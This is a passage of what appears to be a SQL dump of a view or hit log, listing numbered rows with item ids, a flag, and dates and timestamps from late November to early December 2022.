22:26:01'),(64899,4420,1,'2022-11-25','2022-11-25 23:32:58'),(64900,3066,1,'2022-11-25','2022-11-25 23:37:34'),(64901,1544,1,'2022-11-25','2022-11-25 23:40:44'),(64902,1544,1,'2022-11-26','2022-11-26 00:07:59'),(64903,467,1,'2022-11-26','2022-11-26 00:25:42'),(64904,4911,1,'2022-11-26','2022-11-26 00:44:34'),(64905,3006,1,'2022-11-26','2022-11-26 01:07:08'),(64906,1586,1,'2022-11-26','2022-11-26 02:16:25'),(64907,1588,1,'2022-11-26','2022-11-26 02:24:52'),(64908,4976,1,'2022-11-26','2022-11-26 02:32:25'),(64909,1596,1,'2022-11-26','2022-11-26 03:17:44'),(64910,4977,1,'2022-11-26','2022-11-26 03:32:29'),(64911,3691,1,'2022-11-26','2022-11-26 03:34:07'),(64912,4845,1,'2022-11-26','2022-11-26 03:43:06'),(64913,470,1,'2022-11-26','2022-11-26 04:20:58'),(64914,468,1,'2022-11-26','2022-11-26 04:46:48'),(64915,468,1,'2022-11-26','2022-11-26 04:47:55'),(64916,4753,1,'2022-11-26','2022-11-26 04:48:00'),(64917,4983,1,'2022-11-26','2022-11-26 05:10:04'),(64918,4988,1,'2022-11-26','2022-11-26 05:32:34'),(64919,470,1,'2022-11-26','2022-11-26 05:49:06'),(64920,3030,1,'2022-11-26','2022-11-26 06:34:06'),(64921,84,1,'2022-11-26','2022-11-26 06:57:32'),(64922,91,1,'2022-11-26','2022-11-26 06:58:00'),(64923,68,1,'2022-11-26','2022-11-26 06:58:16'),(64924,4768,1,'2022-11-26','2022-11-26 07:05:07'),(64925,570,1,'2022-11-26','2022-11-26 07:13:02'),(64926,2993,1,'2022-11-26','2022-11-26 07:15:26'),(64927,570,1,'2022-11-26','2022-11-26 07:54:55'),(64928,68,1,'2022-11-26','2022-11-26 07:57:51'),(64929,68,1,'2022-11-26','2022-11-26 08:01:04'),(64930,1703,1,'2022-11-26','2022-11-26 09:01:14'),(64931,2617,1,'2022-11-26','2022-11-26 09:32:36'),(64932,2617,1,'2022-11-26','2022-11-26 09:34:08'),(64933,2617,1,'2022-11-26','2022-11-26 09:38:06'),(64934,1596,1,'2022-11-26','2022-11-26 10:01:13'),(64935,2617,1,'2022-11-26','2022-11-26 10:14:34'),(64936,469,1,'2022-11-26','2022-11-26 10:27:43'),(64937,3764,1,'2022-11-26','2022-11-26 10:57:46'),(64938,4911,1,'2022-11-26','2022-11-26 12:53:10'),(64939,470,1,'2022-11-26','2022-11-26 13:55:41'),(64940,2911,1,'2022-11-26','2022-11-26 13:57:03'),(64941,4980,1,'2022-11-26','2022-11-26 13:59:28'),(64942,2911,1,'2022-11-26','2022-11-26 13:59:37'),(64943,1728,1,'2022-11-26','2022-11-26 14:02:52'),(64944,1728,1,'2022-11-26','2022-11-26 14:03:20'),(64945,1728,1,'2022-11-26','2022-11-26 14:06:17'),(64946,1728,1,'2022-11-26','2022-11-26 14:06:27'),(64947,468,1,'2022-11-26','2022-11-26 14:07:39'),(64948,1600,1,'2022-11-26','2022-11-26 14:12:12'),(64949,4911,1,'2022-11-26','2022-11-26 14:13:05'),(64950,474,1,'2022-11-26','2022-11-26 14:16:48'),(64951,473,1,'2022-11-26','2022-11-26 14:25:38'),(64952,487,1,'2022-11-26','2022-11-26 14:34:46'),(64953,4759,1,'2022-11-26','2022-11-26 14:42:46'),(64954,1588,1,'2022-11-26','2022-11-26 14:57:45'),(64955,5163,1,'2022-11-26','2022-11-26 15:15:29'),(64956,80,1,'2022-11-26','2022-11-26 15:16:05'),(64957,5163,1,'2022-11-26','2022-11-26 15:17:05'),(64958,4963,1,'2022-11-26','2022-11-26 15:19:31'),(64959,3691,1,'2022-11-26','2022-11-26 15:48:45'),(64960,1582,1,'2022-11-26','2022-11-26 16:42:40'),(64961,1610,1,'2022-11-26','2022-11-26 17:04:13'),(64962,1610,1,'2022-11-26','2022-11-26 17:04:15'),(64963,469,1,'2022-11-26','2022-11-26 17:07:41'),(64964,4485,1,'2022-11-26','2022-11-26 18:10:33'),(64965,4960,1,'2022-11-26','2022-11-26 18:24:59'),(64966,2609,1,'2022-11-26','2022-11-26 18:30:27'),(64967,80,1,'2022-11-26','2022-11-26 18:54:05'),(64968,1600,1,'2022-11-26','2022-11-26 19:01:58'),(64969,1600,1,'2022-11-26','2022-11-26 19:09:35'),(64970,1612,1,'2022-11-26','2022-11-26 20:40:00'),(64971,1594,1,'2022-11-26','2022-11-26 20:42:02'),(64972,1594,1,'2022-11-26','2022-11-26 20:43:48'),(64973,1745,1,'2022-11-26','2022-11-26 21:31:24'),(64974,4762,1,'2022-11-26','2022-11-26 21:52:07'),(64975,4963,1,'2022-11-26','2022-11-26 22:10:05'),(64976,4762,1,'2022-11-26','2022-11-26 22:45:50'),(64977,1598,1,'2022-11-27','2022-11-27 02:26:21'),(64978,4412,1,'2022-11-27','2022-11-27 02:36:42'),(64979,3482,1,'2022-11-27','2022-11-27 03:25:21'),(64980,3498,1,'2022-11-27','2022-11-27 03:25:24'),(64981,3430,1,'2022-11-27','2022-11-27 03:25:25'),(64982,3742,1,'2022-11-27','2022-11-27 03:25:26'),(64983,3438,1,'2022-11-27','2022-11-27 03:25:27'),(64984,2769,1,'2022-11-27','2022-11-27 03:50:34'),(64985,5163,1,'2022-11-27','2022-11-27 04:31:36'),(64986,89,1,'2022-11-27','2022-11-27 06:46:43'),(64987,4412,1,'2022-11-27','2022-11-27 07:57:02'),(64988,1606,1,'2022-11-27','2022-11-27 08:57:31'),(64989,4529,1,'2022-11-27','2022-11-27 09:26:57'),(64990,4408,1,'2022-11-27','2022-11-27 10:25:06'),(64991,1610,1,'2022-11-27','2022-11-27 10:40:18'),(64992,4520,1,'2022-11-27','2022-11-27 10:47:27'),(64993,1610,1,'2022-11-27','2022-11-27 11:01:08'),(64994,4976,1,'2022-11-27','2022-11-27 11:42:07'),(64995,469,1,'2022-11-27','2022-11-27 11:42:54'),(64996,2617,1,'2022-11-27','2022-11-27 13:08:58'),(64997,4412,1,'2022-11-27','2022-11-27 13:19:51'),(64998,2989,1,'2022-11-27','2022-11-27 13:26:21'),(64999,1600,1,'2022-11-27','2022-11-27 13:53:54'),(65000,3109,1,'2022-11-27','2022-11-27 14:07:32'),(65001,3006,1,'2022-11-27','2022-11-27 14:39:02'),(65002,4323,1,'2022-11-27','2022-11-27 14:46:44'),(65003,4911,1,'2022-11-27','2022-11-27 15:12:47'),(65004,4703,1,'2022-11-27','2022-11-27 15:31:41'),(65005,1745,1,'2022-11-27','2022-11-27 15:51:44'),(65006,2165,1,'2022-11-27','2022-11-27 15:53:46'),(65007,4412,1,'2022-11-27','2022-11-27 16:05:17'),(65008,3706,1,'2022-11-27','2022-11-27 16:15:37'),(65009,87,1,'2022-11-27','2022-11-27 16:38:22'),(65010,2769,1,'2022-11-27','2022-11-27 17:04:42'),(65011,1745,1,'2022-11-27','2022-11-27 17:10:28'),(65012,4768,1,'2022-11-27','2022-11-27 17:12:32'),(65013,72,1,'2022-11-27','2022-11-27 17:22:42'),(65014,4412,1,'2022-11-27','2022-11-27 17:32:46'),(65015,3030,1,'2022-11-27','2022-11-27 17:38:21'),(65016,2150,1,'2022-11-27','2022-11-27 18:17:13'),(65017,4412,1,'2022-11-27','2022-11-27 18:23:13'),(65018,3781,1,'2022-11-27','2022-11-27 18:42:23'),(65019,4776,1,'2022-11-27','2022-11-27 19:43:42'),(65020,2309,1,'2022-11-27','2022-11-27 20:37:50'),(65021,2309,1,'2022-11-27','2022-11-27 20:37:59'),(65022,2309,1,'2022-11-27','2022-11-27 20:39:17'),(65023,2309,1,'2022-11-27','2022-11-27 20:39:19'),(65024,5140,1,'2022-11-27','2022-11-27 21:28:11'),(65025,5062,1,'2022-11-27','2022-11-27 21:51:23'),(65026,4391,1,'2022-11-27','2022-11-27 22:10:37'),(65027,2159,1,'2022-11-27','2022-11-27 22:13:40'),(65028,2159,1,'2022-11-27','2022-11-27 22:13:56'),(65029,2159,1,'2022-11-27','2022-11-27 22:14:13'),(65030,335,1,'2022-11-27','2022-11-27 22:16:45'),(65031,2159,1,'2022-11-27','2022-11-27 22:20:03'),(65032,1600,1,'2022-11-27','2022-11-27 23:26:05'),(65033,3764,1,'2022-11-27','2022-11-27 23:37:53'),(65034,468,1,'2022-11-27','2022-11-27 23:54:37'),(65035,1604,1,'2022-11-27','2022-11-27 23:59:47'),(65036,3285,1,'2022-11-28','2022-11-28 00:32:46'),(65037,4657,1,'2022-11-28','2022-11-28 00:34:36'),(65038,1544,1,'2022-11-28','2022-11-28 01:26:47'),(65039,3721,1,'2022-11-28','2022-11-28 01:59:16'),(65040,3273,1,'2022-11-28','2022-11-28 02:50:14'),(65041,2813,1,'2022-11-28','2022-11-28 03:33:55'),(65042,76,1,'2022-11-28','2022-11-28 04:19:11'),(65043,3691,1,'2022-11-28','2022-11-28 04:25:49'),(65044,76,1,'2022-11-28','2022-11-28 04:47:34'),(65045,3265,1,'2022-11-28','2022-11-28 05:11:30'),(65046,1610,1,'2022-11-28','2022-11-28 05:16:38'),(65047,3265,1,'2022-11-28','2022-11-28 05:36:01'),(65048,4750,1,'2022-11-28','2022-11-28 07:16:38'),(65049,1600,1,'2022-11-28','2022-11-28 07:35:29'),(65050,3072,1,'2022-11-28','2022-11-28 07:37:40'),(65051,1877,1,'2022-11-28','2022-11-28 08:29:06'),(65052,1782,1,'2022-11-28','2022-11-28 08:41:15'),(65053,1610,1,'2022-11-28','2022-11-28 08:55:11'),(65054,1610,1,'2022-11-28','2022-11-28 08:55:24'),(65055,3030,1,'2022-11-28','2022-11-28 09:14:03'),(65056,4520,1,'2022-11-28','2022-11-28 09:40:31'),(65057,4404,1,'2022-11-28','2022-11-28 10:11:29'),(65058,1604,1,'2022-11-28','2022-11-28 11:04:02'),(65059,1745,1,'2022-11-28','2022-11-28 11:04:44'),(65060,1745,1,'2022-11-28','2022-11-28 11:04:57'),(65061,1745,1,'2022-11-28','2022-11-28 11:05:15'),(65062,1604,1,'2022-11-28','2022-11-28 11:06:23'),(65063,2751,1,'2022-11-28','2022-11-28 11:11:39'),(65064,76,1,'2022-11-28','2022-11-28 11:12:36'),(65065,89,1,'2022-11-28','2022-11-28 11:14:33'),(65066,4551,1,'2022-11-28','2022-11-28 11:40:31'),(65067,1604,1,'2022-11-28','2022-11-28 12:02:29'),(65068,4963,1,'2022-11-28','2022-11-28 12:33:31'),(65069,468,1,'2022-11-28','2022-11-28 12:43:54'),(65070,5062,1,'2022-11-28','2022-11-28 13:18:06'),(65071,76,1,'2022-11-28','2022-11-28 14:19:49'),(65072,2297,1,'2022-11-28','2022-11-28 14:23:23'),(65073,477,1,'2022-11-28','2022-11-28 14:31:34'),(65074,1608,1,'2022-11-28','2022-11-28 14:33:58'),(65075,2309,1,'2022-11-28','2022-11-28 14:44:36'),(65076,3102,1,'2022-11-28','2022-11-28 14:53:39'),(65077,1610,1,'2022-11-28','2022-11-28 14:53:57'),(65078,3764,1,'2022-11-28','2022-11-28 14:58:29'),(65079,570,1,'2022-11-28','2022-11-28 15:23:02'),(65080,4436,1,'2022-11-28','2022-11-28 15:24:54'),(65081,1600,1,'2022-11-28','2022-11-28 16:43:13'),(65082,1544,1,'2022-11-28','2022-11-28 17:02:20'),(65083,3030,1,'2022-11-28','2022-11-28 17:11:53'),(65084,4238,1,'2022-11-28','2022-11-28 17:21:28'),(65085,4520,1,'2022-11-28','2022-11-28 17:37:48'),(65086,3287,1,'2022-11-28','2022-11-28 18:31:52'),(65087,1544,1,'2022-11-28','2022-11-28 18:47:02'),(65088,2911,1,'2022-11-28','2022-11-28 19:13:51'),(65089,4485,1,'2022-11-28','2022-11-28 19:14:05'),(65090,3004,1,'2022-11-28','2022-11-28 20:15:15'),(65091,478,1,'2022-11-28','2022-11-28 20:16:40'),(65092,4485,1,'2022-11-28','2022-11-28 20:43:53'),(65093,4950,1,'2022-11-28','2022-11-28 21:26:21'),(65094,467,1,'2022-11-28','2022-11-28 21:43:30'),(65095,3004,1,'2022-11-28','2022-11-28 21:43:35'),(65096,4448,1,'2022-11-28','2022-11-28 22:02:18'),(65097,4448,1,'2022-11-28','2022-11-28 22:15:26'),(65098,2293,1,'2022-11-28','2022-11-28 22:43:15'),(65099,4980,1,'2022-11-28','2022-11-28 22:58:26'),(65100,467,1,'2022-11-28','2022-11-28 23:11:43'),(65101,474,1,'2022-11-28','2022-11-28 23:24:16'),(65102,2419,1,'2022-11-28','2022-11-28 23:34:12'),(65103,2178,1,'2022-11-28','2022-11-28 23:56:21'),(65104,2911,1,'2022-11-29','2022-11-29 01:52:48'),(65105,3102,1,'2022-11-29','2022-11-29 03:13:31'),(65106,4520,1,'2022-11-29','2022-11-29 03:25:07'),(65107,3030,1,'2022-11-29','2022-11-29 03:32:35'),(65108,4950,1,'2022-11-29','2022-11-29 03:35:03'),(65109,4930,1,'2022-11-29','2022-11-29 03:37:12'),(65110,4391,1,'2022-11-29','2022-11-29 04:06:36'),(65111,1594,1,'2022-11-29','2022-11-29 04:10:59'),(65112,4750,1,'2022-11-29','2022-11-29 04:22:09'),(65113,4703,1,'2022-11-29','2022-11-29 04:30:02'),(65114,2769,1,'2022-11-29','2022-11-29 05:03:37'),(65115,4747,1,'2022-11-29','2022-11-29 05:33:08'),(65116,1877,1,'2022-11-29','2022-11-29 05:47:23'),(65117,1602,1,'2022-11-29','2022-11-29 06:14:10'),(65118,1870,1,'2022-11-29','2022-11-29 07:03:10'),(65119,1695,1,'2022-11-29','2022-11-29 08:10:15'),(65120,1610,1,'2022-11-29','2022-11-29 08:22:25'),(65121,474,1,'2022-11-29','2022-11-29 08:29:10'),(65122,1586,1,'2022-11-29','2022-11-29 09:58:07'),(65123,80,1,'2022-11-29','2022-11-29 10:38:04'),(65124,68,1,'2022-11-29','2022-11-29 10:38:09'),(65125,108,1,'2022-11-29','2022-11-29 10:38:12'),(65126,1586,1,'2022-11-29','2022-11-29 10:53:39'),(65127,4301,1,'2022-11-29','2022-11-29 12:08:00'),(65128,1598,1,'2022-11-29','2022-11-29 12:08:25'),(65129,1594,1,'2022-11-29','2022-11-29 12:30:20'),(65130,108,1,'2022-11-29','2022-11-29 13:09:18'),(65131,4520,1,'2022-11-29','2022-11-29 13:21:20'),(65132,1602,1,'2022-11-29','2022-11-29 14:09:50'),(65133,3781,1,'2022-11-29','2022-11-29 14:33:51'),(65134,3087,1,'2022-11-29','2022-11-29 14:39:36'),(65135,1600,1,'2022-11-29','2022-11-29 15:01:13'),(65136,5128,1,'2022-11-29','2022-11-29 15:10:19'),(65137,74,1,'2022-11-29','2022-11-29 15:12:40'),(65138,3781,1,'2022-11-29','2022-11-29 15:13:51'),(65139,335,1,'2022-11-29','2022-11-29 15:15:15'),(65140,4747,1,'2022-11-29','2022-11-29 15:32:40'),(65141,3694,1,'2022-11-29','2022-11-29 16:08:09'),(65142,2989,1,'2022-11-29','2022-11-29 16:15:39'),(65143,3438,1,'2022-11-29','2022-11-29 17:04:22'),(65144,2989,1,'2022-11-29','2022-11-29 17:14:11'),(65145,2609,1,'2022-11-29','2022-11-29 17:47:07'),(65146,5140,1,'2022-11-29','2022-11-29 18:24:33'),(65147,2503,1,'2022-11-29','2022-11-29 18:52:39'),(65148,1582,1,'2022-11-29','2022-11-29 18:58:11'),(65149,3438,1,'2022-11-29','2022-11-29 19:05:22'),(65150,1600,1,'2022-11-29','2022-11-29 20:03:31'),(65151,76,1,'2022-11-29','2022-11-29 20:04:41'),(65152,1600,1,'2022-11-29','2022-11-29 20:06:01'),(65153,68,1,'2022-11-29','2022-11-29 20:06:34'),(65154,2775,1,'2022-11-29','2022-11-29 20:08:36'),(65155,1600,1,'2022-11-29','2022-11-29 20:24:20'),(65156,2904,1,'2022-11-29','2022-11-29 20:25:39'),(65157,2904,1,'2022-11-29','2022-11-29 20:26:11'),(65158,80,1,'2022-11-29','2022-11-29 20:26:29'),(65159,1598,1,'2022-11-29','2022-11-29 20:43:08'),(65160,1596,1,'2022-11-29','2022-11-29 21:02:00'),(65161,1594,1,'2022-11-29','2022-11-29 21:42:41'),(65162,1598,1,'2022-11-29','2022-11-29 21:49:11'),(65163,1610,1,'2022-11-29','2022-11-29 21:52:25'),(65164,1602,1,'2022-11-29','2022-11-29 21:53:41'),(65165,108,1,'2022-11-29','2022-11-29 21:58:11'),(65166,1602,1,'2022-11-29','2022-11-29 22:02:37'),(65167,1602,1,'2022-11-29','2022-11-29 22:14:22'),(65168,80,1,'2022-11-29','2022-11-29 22:14:33'),(65169,2609,1,'2022-11-29','2022-11-29 22:40:37'),(65170,1596,1,'2022-11-29','2022-11-29 23:19:37'),(65171,1596,1,'2022-11-29','2022-11-29 23:19:38'),(65172,1596,1,'2022-11-29','2022-11-29 23:19:52'),(65173,1602,1,'2022-11-29','2022-11-29 23:45:53'),(65174,3102,1,'2022-11-30','2022-11-30 00:17:08'),(65175,108,1,'2022-11-30','2022-11-30 00:18:16'),(65176,4960,1,'2022-11-30','2022-11-30 01:05:15'),(65177,1600,1,'2022-11-30','2022-11-30 01:21:57'),(65178,4416,1,'2022-11-30','2022-11-30 01:26:16'),(65179,1600,1,'2022-11-30','2022-11-30 02:10:49'),(65180,2297,1,'2022-11-30','2022-11-30 03:40:13'),(65181,1586,1,'2022-11-30','2022-11-30 04:23:56'),(65182,2457,1,'2022-11-30','2022-11-30 05:42:19'),(65183,4785,1,'2022-11-30','2022-11-30 06:44:21'),(65184,1602,1,'2022-11-30','2022-11-30 07:38:21'),(65185,4457,1,'2022-11-30','2022-11-30 08:06:41'),(65186,87,1,'2022-11-30','2022-11-30 08:15:09'),(65187,4738,1,'2022-11-30','2022-11-30 08:20:50'),(65188,1614,1,'2022-11-30','2022-11-30 08:23:46'),(65189,5037,1,'2022-11-30','2022-11-30 08:43:46'),(65190,1582,1,'2022-11-30','2022-11-30 10:25:27'),(65191,4802,1,'2022-11-30','2022-11-30 11:16:17'),(65192,3724,1,'2022-11-30','2022-11-30 11:19:35'),(65193,80,1,'2022-11-30','2022-11-30 11:20:19'),(65194,5140,1,'2022-11-30','2022-11-30 11:20:45'),(65195,4618,1,'2022-11-30','2022-11-30 11:25:18'),(65196,1602,1,'2022-11-30','2022-11-30 11:55:55'),(65197,68,1,'2022-11-30','2022-11-30 12:12:12'),(65198,1594,1,'2022-11-30','2022-11-30 12:42:40'),(65199,4966,1,'2022-11-30','2022-11-30 12:54:08'),(65200,4436,1,'2022-11-30','2022-11-30 12:56:07'),(65201,2617,1,'2022-11-30','2022-11-30 13:03:38'),(65202,4412,1,'2022-11-30','2022-11-30 13:05:32'),(65203,4412,1,'2022-11-30','2022-11-30 13:05:36'),(65204,4835,1,'2022-11-30','2022-11-30 13:48:15'),(65205,4835,1,'2022-11-30','2022-11-30 13:48:29'),(65206,1722,1,'2022-11-30','2022-11-30 13:51:02'),(65207,1722,1,'2022-11-30','2022-11-30 13:51:15'),(65208,1722,1,'2022-11-30','2022-11-30 13:51:32'),(65209,1608,1,'2022-11-30','2022-11-30 14:00:48'),(65210,1608,1,'2022-11-30','2022-11-30 14:01:23'),(65211,4966,1,'2022-11-30','2022-11-30 14:22:51'),(65212,108,1,'2022-11-30','2022-11-30 14:28:34'),(65213,2309,1,'2022-11-30','2022-11-30 15:31:02'),(65214,1598,1,'2022-11-30','2022-11-30 15:34:22'),(65215,1594,1,'2022-11-30','2022-11-30 15:42:16'),(65216,2965,1,'2022-11-30','2022-11-30 15:43:34'),(65217,4988,1,'2022-11-30','2022-11-30 16:03:45'),(65218,5024,1,'2022-11-30','2022-11-30 16:13:50'),(65219,5024,1,'2022-11-30','2022-11-30 16:24:47'),(65220,3004,1,'2022-11-30','2022-11-30 16:51:59'),(65221,1596,1,'2022-11-30','2022-11-30 16:52:11'),(65222,3004,1,'2022-11-30','2022-11-30 16:54:36'),(65223,1728,1,'2022-11-30','2022-11-30 17:19:17'),(65224,1728,1,'2022-11-30','2022-11-30 17:19:48'),(65225,1728,1,'2022-11-30','2022-11-30 17:21:18'),(65226,570,1,'2022-11-30','2022-11-30 17:21:39'),(65227,1728,1,'2022-11-30','2022-11-30 17:22:20'),(65228,1728,1,'2022-11-30','2022-11-30 17:25:16'),(65229,3117,1,'2022-11-30','2022-11-30 17:45:27'),(65230,4301,1,'2022-11-30','2022-11-30 18:44:31'),(65231,1594,1,'2022-11-30','2022-11-30 18:46:51'),(65232,1596,1,'2022-11-30','2022-11-30 19:23:07'),(65233,1596,1,'2022-11-30','2022-11-30 19:23:13'),(65234,4485,1,'2022-11-30','2022-11-30 20:14:29'),(65235,2297,1,'2022-11-30','2022-11-30 20:18:07'),(65236,1606,1,'2022-11-30','2022-11-30 20:40:52'),(65237,80,1,'2022-11-30','2022-11-30 21:45:08'),(65238,4485,1,'2022-11-30','2022-11-30 21:45:53'),(65239,1596,1,'2022-11-30','2022-11-30 21:59:45'),(65240,476,1,'2022-11-30','2022-11-30 22:17:11'),(65241,4930,1,'2022-11-30','2022-11-30 23:13:42'),(65242,4930,1,'2022-11-30','2022-11-30 23:14:00'),(65243,1544,1,'2022-11-30','2022-11-30 23:24:25'),(65244,3055,1,'2022-11-30','2022-11-30 23:45:47'),(65245,470,1,'2022-12-01','2022-12-01 00:33:18'),(65246,80,1,'2022-12-01','2022-12-01 02:42:58'),(65247,1614,1,'2022-12-01','2022-12-01 03:02:56'),(65248,91,1,'2022-12-01','2022-12-01 03:05:08'),(65249,3265,1,'2022-12-01','2022-12-01 03:17:02'),(65250,2617,1,'2022-12-01','2022-12-01 03:47:48'),(65251,1745,1,'2022-12-01','2022-12-01 04:04:10'),(65252,1745,1,'2022-12-01','2022-12-01 04:05:07'),(65253,1745,1,'2022-12-01','2022-12-01 04:05:15'),(65254,3290,1,'2022-12-01','2022-12-01 04:10:05'),(65255,4944,1,'2022-12-01','2022-12-01 05:18:11'),(65256,5080,1,'2022-12-01','2022-12-01 05:21:10'),(65257,5080,1,'2022-12-01','2022-12-01 05:25:41'),(65258,1544,1,'2022-12-01','2022-12-01 05:43:28'),(65259,467,1,'2022-12-01','2022-12-01 06:29:23'),(65260,5163,1,'2022-12-01','2022-12-01 07:10:09'),(65261,478,1,'2022-12-01','2022-12-01 07:12:19'),(65262,1598,1,'2022-12-01','2022-12-01 07:17:51'),(65263,2159,1,'2022-12-01','2022-12-01 07:33:32'),(65264,3313,1,'2022-12-01','2022-12-01 07:40:18'),(65265,4344,1,'2022-12-01','2022-12-01 08:17:50'),(65266,4963,1,'2022-12-01','2022-12-01 09:07:26'),(65267,335,1,'2022-12-01','2022-12-01 09:07:49'),(65268,87,1,'2022-12-01','2022-12-01 09:08:36'),(65269,335,1,'2022-12-01','2022-12-01 09:09:03'),(65270,4963,1,'2022-12-01','2022-12-01 09:09:06'),(65271,4963,1,'2022-12-01','2022-12-01 09:09:20'),(65272,3705,1,'2022-12-01','2022-12-01 09:17:49'),(65273,1594,1,'2022-12-01','2022-12-01 09:25:26'),(65274,1596,1,'2022-12-01','2022-12-01 09:37:40'),(65275,1598,1,'2022-12-01','2022-12-01 09:40:31'),(65276,80,1,'2022-12-01','2022-12-01 09:41:52'),(65277,1598,1,'2022-12-01','2022-12-01 09:42:52'),(65278,2989,1,'2022-12-01','2022-12-01 10:29:00'),(65279,1588,1,'2022-12-01','2022-12-01 11:21:53'),(65280,3102,1,'2022-12-01','2022-12-01 11:38:31'),(65281,91,1,'2022-12-01','2022-12-01 11:47:53'),(65282,80,1,'2022-12-01','2022-12-01 11:54:24'),(65283,91,1,'2022-12-01','2022-12-01 11:56:37'),(65284,68,1,'2022-12-01','2022-12-01 11:57:27'),(65285,91,1,'2022-12-01','2022-12-01 12:02:24'),(65286,1594,1,'2022-12-01','2022-12-01 12:09:37'),(65287,477,1,'2022-12-01','2022-12-01 12:39:34'),(65288,4963,1,'2022-12-01','2022-12-01 13:01:59'),(65289,1614,1,'2022-12-01','2022-12-01 13:37:35'),(65290,2904,1,'2022-12-01','2022-12-01 13:38:47'),(65291,2159,1,'2022-12-01','2022-12-01 13:53:04'),(65292,477,1,'2022-12-01','2022-12-01 13:54:30'),(65293,1722,1,'2022-12-01','2022-12-01 14:14:27'),(65294,1722,1,'2022-12-01','2022-12-01 14:15:11'),(65295,91,1,'2022-12-01','2022-12-01 14:15:28'),(65296,2154,1,'2022-12-01','2022-12-01 14:46:07'),(65297,1594,1,'2022-12-01','2022-12-01 14:46:28'),(65298,4420,1,'2022-12-01','2022-12-01 14:48:16'),(65299,3691,1,'2022-12-01','2022-12-01 14:51:19'),(65300,1610,1,'2022-12-01','2022-12-01 14:52:47'),(65301,3307,1,'2022-12-01','2022-12-01 14:53:44'),(65302,2965,1,'2022-12-01','2022-12-01 14:53:59'),(65303,1610,1,'2022-12-01','2022-12-01 14:54:18'),(65304,3673,1,'2022-12-01','2022-12-01 15:01:36'),(65305,4738,1,'2022-12-01','2022-12-01 15:10:34'),(65306,5163,1,'2022-12-01','2022-12-01 15:17:09'),(65307,4776,1,'2022-12-01','2022-12-01 15:22:59'),(65308,4436,1,'2022-12-01','2022-12-01 15:26:07'),(65309,1586,1,'2022-12-01','2022-12-01 15:32:35'),(65310,3313,1,'2022-12-01','2022-12-01 15:34:05'),(65311,4960,1,'2022-12-01','2022-12-01 15:43:33'),(65312,1594,1,'2022-12-01','2022-12-01 15:47:00'),(65313,4960,1,'2022-12-01','2022-12-01 15:54:22'),(65314,1602,1,'2022-12-01','2022-12-01 15:54:22'),(65315,80,1,'2022-12-01','2022-12-01 15:54:35'),(65316,1602,1,'2022-12-01','2022-12-01 15:55:21'),(65317,4960,1,'2022-12-01','2022-12-01 16:02:14'),(65318,2965,1,'2022-12-01','2022-12-01 16:26:09'),(65319,1594,1,'2022-12-01','2022-12-01 17:14:18'),(65320,1596,1,'2022-12-01','2022-12-01 18:43:39'),(65321,5140,1,'2022-12-01','2022-12-01 18:44:01'),(65322,3706,1,'2022-12-01','2022-12-01 19:17:33'),(65323,1877,1,'2022-12-01','2022-12-01 19:19:16'),(65324,2411,1,'2022-12-01','2022-12-01 19:28:59'),(65325,4700,1,'2022-12-01','2022-12-01 19:39:19'),(65326,1614,1,'2022-12-01','2022-12-01 20:27:53'),(65327,91,1,'2022-12-01','2022-12-01 20:44:20'),(65328,1610,1,'2022-12-01','2022-12-01 21:13:45'),(65329,3781,1,'2022-12-01','2022-12-01 21:46:01'),(65330,87,1,'2022-12-01','2022-12-01 22:03:59'),(65331,1594,1,'2022-12-01','2022-12-01 22:04:10'),(65332,1582,1,'2022-12-01','2022-12-01 22:37:29'),(65333,482,1,'2022-12-01','2022-12-01 22:55:49'),(65334,4524,1,'2022-12-01','2022-12-01 22:55:54'),(65335,1610,1,'2022-12-01','2022-12-01 22:56:22'),(65336,2410,1,'2022-12-01','2022-12-01 23:10:41'),(65337,1610,1,'2022-12-01','2022-12-01 23:27:14'),(65338,5163,1,'2022-12-01','2022-12-01 23:49:06'),(65339,4344,1,'2022-12-01','2022-12-01 23:56:50'),(65340,3290,1,'2022-12-02','2022-12-02 00:07:38'),(65341,482,1,'2022-12-02','2022-12-02 00:25:48'),(65342,3430,1,'2022-12-02','2022-12-02 00:26:49'),(65343,4996,1,'2022-12-02','2022-12-02 00:41:29'),(65344,4428,1,'2022-12-02','2022-12-02 00:45:36'),(65345,2410,1,'2022-12-02','2022-12-02 00:46:09'),(65346,1608,1,'2022-12-02','2022-12-02 00:48:31'),(65347,1608,1,'2022-12-02','2022-12-02 00:49:38'),(65348,1594,1,'2022-12-02','2022-12-02 01:31:31'),(65349,5163,1,'2022-12-02','2022-12-02 01:42:02'),(65350,3673,1,'2022-12-02','2022-12-02 02:13:07'),(65351,4520,1,'2022-12-02','2022-12-02 02:38:48'),(65352,1596,1,'2022-12-02','2022-12-02 04:00:07'),(65353,87,1,'2022-12-02','2022-12-02 04:52:53'),(65354,483,1,'2022-12-02','2022-12-02 04:53:25'),(65355,483,1,'2022-12-02','2022-12-02 04:59:25'),(65356,108,1,'2022-12-02','2022-12-02 05:00:30'),(65357,3066,1,'2022-12-02','2022-12-02 05:04:23'),(65358,1737,1,'2022-12-02','2022-12-02 05:19:10'),(65359,1747,1,'2022-12-02','2022-12-02 05:21:26'),(65360,1596,1,'2022-12-02','2022-12-02 05:29:19'),(65361,80,1,'2022-12-02','2022-12-02 05:30:14'),(65362,68,1,'2022-12-02','2022-12-02 05:30:28'),(65363,2457,1,'2022-12-02','2022-12-02 05:50:43'),(65364,3752,1,'2022-12-02','2022-12-02 06:37:33'),(65365,4654,1,'2022-12-02','2022-12-02 06:53:12'),(65366,4700,1,'2022-12-02','2022-12-02 07:00:03'),(65367,1582,1,'2022-12-02','2022-12-02 07:20:38'),(65368,80,1,'2022-12-02','2022-12-02 07:22:06'),(65369,2965,1,'2022-12-02','2022-12-02 09:39:22'),(65370,1608,1,'2022-12-02','2022-12-02 09:57:33'),(65371,1582,1,'2022-12-02','2022-12-02 10:17:27'),(65372,4416,1,'2022-12-02','2022-12-02 10:42:18'),(65373,3290,1,'2022-12-02','2022-12-02 12:45:58'),(65374,80,1,'2022-12-02','2022-12-02 13:30:58'),(65375,80,1,'2022-12-02','2022-12-02 13:31:38'),(65376,4404,1,'2022-12-02','2022-12-02 13:49:02'),(65377,4428,1,'2022-12-02','2022-12-02 13:55:17'),(65378,1596,1,'2022-12-02','2022-12-02 13:55:24'),(65379,1582,1,'2022-12-02','2022-12-02 14:13:55'),(65380,2411,1,'2022-12-02','2022-12-02 14:40:16'),(65381,1608,1,'2022-12-02','2022-12-02 14:42:59'),(65382,108,1,'2022-12-02','2022-12-02 14:49:11'),(65383,2704,1,'2022-12-02','2022-12-02 15:05:50'),(65384,3752,1,'2022-12-02','2022-12-02 